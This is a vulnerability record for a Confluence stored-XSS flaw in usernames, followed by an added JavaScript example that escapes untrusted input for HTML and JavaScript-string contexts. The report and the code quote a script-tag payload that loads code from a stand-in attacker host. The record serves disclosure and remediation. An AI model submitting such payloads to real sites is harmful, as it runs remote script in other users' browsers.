ID ATLASSIAN:CONF-7615 Type atlassian Reporter jefft Modified 2017-02-17T05:35:09
Description
When signing up for an account, it is possible to enter a username like "<script src=http://drevil.com/xss>fred</script>". Confluence will accept this, and on certain pages, render it as raw HTML to the user, opening the possibility of cross-site scripting (XSS) attacks.
Two places I've spotted the raw HTML so far:
 - Most prominently, when an admin goes to Manage Users -> Show All Users, and the username displays in the list, the raw HTML is rendered.
 - When editing a page created by such a user, the togglePermissions() JavaScript will display it, breaking later tags:
   if ($('edit-personal').checked) $('editPermission').value = "<script src=http://drevil.com/xss>fred</script>";
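The report names two different output contexts for the same untrusted value: an HTML table cell and a JavaScript string literal inside an inline script. Each needs its own encoding, and escaping quotes alone does not fix the second one, because a literal "</script>" inside a string still ends the script element. The following JavaScript is an added example, not Confluence's code or the reporter's; renderUserRow() and renderEditPermissionAssignment() are hypothetical stand-ins for the two templates the report describes, and the sample username is the one quoted in the description.

```javascript
// Added example (not Confluence code): context-aware encoding of a
// user-supplied username for the two sinks named in the report.

// Constructed sample input, copied from the report's description.
const HOSTILE_USERNAME = '<script src=http://drevil.com/xss>fred</script>';

// 1. HTML body/attribute context (e.g. the "Show All Users" table cell).
//    The six characters that can open a tag, attribute or entity are
//    replaced with entity references.
function htmlEscape(s) {
  return String(s).replace(/[&<>"'\/]/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
  })[c]);
}

// 2. JavaScript string-literal context (e.g. a value assigned inside an
//    inline <script>). Every non-alphanumeric character is \xHH- or
//    \uHHHH-encoded, so the emitted literal can never contain "<", ">",
//    a quote, or the "</script>" sequence that would break the element.
function jsStringEscape(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 256
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Hypothetical server-side template for one row of the user list,
// escaping for the HTML context.
function renderUserRow(username) {
  return '<tr><td>' + htmlEscape(username) + '</td></tr>';
}

// Hypothetical template for the inline assignment quoted in the report
// (the togglePermissions() case), escaping for the JS string context.
function renderEditPermissionAssignment(username) {
  return "$('editPermission').value = \"" + jsStringEscape(username) + '";';
}

// Simple check used to demonstrate the result: neither rendering may
// still contain a raw <script> tag or a script terminator.
function isSafeForHtml(output) {
  return !/<script|<\/script/i.test(output);
}
```

The JS-context encoder round-trips: evaluating the escaped literal yields the original username, so the page shows "<script src=...>fred</script>" as text while the browser never sees a tag. Note that the HTML encoding is not a substitute for the JS one; an HTML-entity-encoded string placed inside a script block is delivered to the script verbatim, entities and all.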
Record metadata
Title: XSS bug: usernames not HTML-encoded in all places
Bulletin family: software
Type: atlassian
Reporter: jefft
Published: 2007-01-10T03:32:00
Modified: 2017-02-17T05:35:09
Last seen: 2017-03-22T18:16:53
Reference: https://jira.atlassian.com/browse/CONF-7615
Affected software: Confluence < 2.10; Confluence <= 2.2.9; Confluence < 2.9.1; Confluence <= 2.3
CVSS: vector NONE, score 0.0 (Vulners score 4.3)
CVE list: none
References: none
Object version: 1.2
Edition: 1
Record hash: 7f4cd9f6e83a8585a6571216199f1767a4a30c3dfc80b4a9d8996d0416ba39e2